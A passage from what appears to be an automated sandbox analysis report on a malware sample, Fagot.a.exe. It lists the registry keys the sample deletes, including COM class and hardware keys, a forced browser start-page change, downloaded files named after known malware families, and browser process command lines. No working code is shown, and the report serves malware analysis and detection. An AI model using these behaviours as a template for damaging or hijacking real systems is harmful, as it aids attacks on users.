| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\0000 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\0000 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Software\Microsoft\Internet Explorer\Main | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
Modifies Internet Explorer start page
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page = "www.blacksnake.com" | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8D6EED60-2737-4425-B38A-490EF273ACBB} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7E29BE61-5809-443F-9B5D-CF22156694EB}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7CE3E768-654D-4BA7-8D95-CDAAC642B141}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6D4B9C3E-CC05-493F-85E2-43D1006DF96A} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{51A21C32-DD1F-4D3C-85F1-6F8A6172CA82}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E93527E9-EA10-5AA7-B8AA-FEA866294704} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9CA277DB-FE42-53B1-AE3B-098E51FA6A9B}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{41A7D761-6018-11CF-9016-00AA0068841E}\ProxyStubClsid | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{41487E33-9A10-42FE-BA3B-15FDE59D09D5} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3580A828-07FE-4B94-AC1A-757D9D2D3056}\TypeLib | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0EA91CF7-8542-4780-8D6B-7BD686CD2471} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{00000205-0000-0010-8000-00AA006D2EA4}\2.5 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{B3AADFEA-8404-4CBE-A62E-B0B715412C9E} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{d27b8d1f-26c0-4ed2-a8b0-cf2e4c374771} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3F1B099B-9507-4CC0-BDD5-CD04DC0C870E} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2090CCFC-70C5-491D-A5E8-BAD2DD9EE3EA}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{90A7734E-841B-4F77-9384-A2891E76E7E2}\NumMethods | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7C2AAE9E-6178-4A88-8904-B57169B655EA} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{FC098A45-913B-4914-B6C3-AE6304593E75}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7500A6BA-EB65-11D1-938D-0000F87557C9}\TypeLib | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{305106E7-98B5-11CF-BB82-00AA00BDCE0B}\TypeLib | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3051046C-98B5-11CF-BB82-00AA00BDCE0B} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{00000206-0000-0010-8000-00AA006D2EA4}\2.6 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C11E0649-8237-5C93-BBDB-2EDA5216FD3F} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{42abdf9f-14a6-5c1f-839b-86029505b1d0} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{79EAC9C5-BAF9-11CE-8C82-00AA004BA90B} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{60F49115-CE92-4F96-8D0A-81CCCAE4AB77} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{87379803-2FAD-4801-ABDF-218B5D2F076F}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8476CE12-AE1F-4198-805C-BA0F9B783F57}\NumMethods | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1525E844-B912-4558-85CF-B1A3FE27D354}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{EB2114C0-CB02-467A-AE4D-2ED171F05E6A} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{EE44CF5F-179A-484A-BB16-AD94F97C0ACB}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C892D1C9-0E80-431C-ACF7-58BEBC0C405D} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7d2312d0-f3a2-5091-8a5e-41832e632c08} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{607a20bf-32b4-5b8e-a793-3024f8d3582a} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1E1760CE-126F-46CA-9734-91A6CBF8B6F3}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1B468D97-6A90-4E92-9F0E-90BACC6AC8C9}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{4AC9E1DA-5BAD-4AC7-86E3-24F4CDCECA28}\c.0\0\Win64 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C5B6042B-FD21-404A-A0EF-E2FBB52B9080}\TypeLib | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BF032216-2C7F-4682-84C1-76EF432D840B}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9d82379d-4958-558e-a155-3a809bb16c04} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{521B4726-04E9-47E7-B3A5-CD93A7F74F5B} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{ED25831F-90DB-498D-A7B4-EBCE807D3C23}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{844dff12-dc13-5f0c-ae3b-e71a4dcce062} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{674DCE15-B9C9-5EC9-B058-AABA6F976C16} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{30510722-98B5-11CF-BB82-00AA00BDCE0B} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E757B2F5-E73E-434E-A1BF-2BD7C3E60FCB} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DD0AEB24-0EFE-5548-8448-E153D4903DF7} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{D64F9DD5-6446-4B26-8C4D-927946908844} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A60384F6-3712-4CB3-BC46-81E6402FEE99}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B9F3FDF1-7B6D-4899-BD94-72E4D4ACD2E1}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7fe52e32-867c-52a3-b3b7-d4dd4d573794} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7E7A4999-92F1-4E88-AE3E-C0854212C635}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{683D7FC9-8697-4309-994E-E8A2C5628884}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{83504C13-A417-5601-9ADB-F1FF18294DC9}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{69D14C80-C18E-11D0-A9CE-006097942311}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6b5828d7-6b8d-58c4-ba3a-9f796710f53c} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{3050F1C5-98B5-11CF-BB82-00AA00BDCE0B} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{D8D2DDA0-FD33-4B6A-9A67-E8C9FB471034} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{AFDBA726-047A-4B83-B8C7-D812FE9CAA5C}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{66BB2F51-5844-4997-8D70-4B7CC221CF92}\TypeLib | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{AC0714F2-3D04-11D1-AE7D-00A0C90F26F4}\1.0\0\win64 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B5B0D747-D4D2-4E2D-872D-74DA22037826}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{54B61A02-4823-42EC-9648-A9AE80CDA270}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\Downloads\Mabezat.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\Floxif.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\ProcessExplorer.zip:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\AgentTesla.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\NetWire.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\Lokibot.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\BabylonClient12.msi:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\Fagot.a.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\Walker.com:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\MadMan.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\Gnil.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\ProcessExplorer\procexp64.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\ProcessExplorer\procexp64.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\ProcessExplorer\procexp64.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "https://www.majorgeeks.com/files/details/microsoft_process_explorer.html"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url https://www.majorgeeks.com/files/details/microsoft_process_explorer.html
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2016 -parentBuildID 20240401114208 -prefsHandle 1956 -prefMapHandle 1948 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7caa1cc7-a812-4986-9451-9459a85bedc3} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2464 -parentBuildID 20240401114208 -prefsHandle 2456 -prefMapHandle 2444 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {28e6b1b8-df3d-4799-9dac-178d5762a78a} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3136 -childID 1 -isForBrowser -prefsHandle 3148 -prefMapHandle 3144 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1028 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c8f1e14c-86c7-45ce-88af-6621343d261b} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3628 -childID 2 -isForBrowser -prefsHandle 3620 -prefMapHandle 2632 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1028 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {08ac5fdf-d50b-4845-a1bd-0a32154e9960} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" tab
C:\Program Files\Mozilla Firefox\firefox.exe
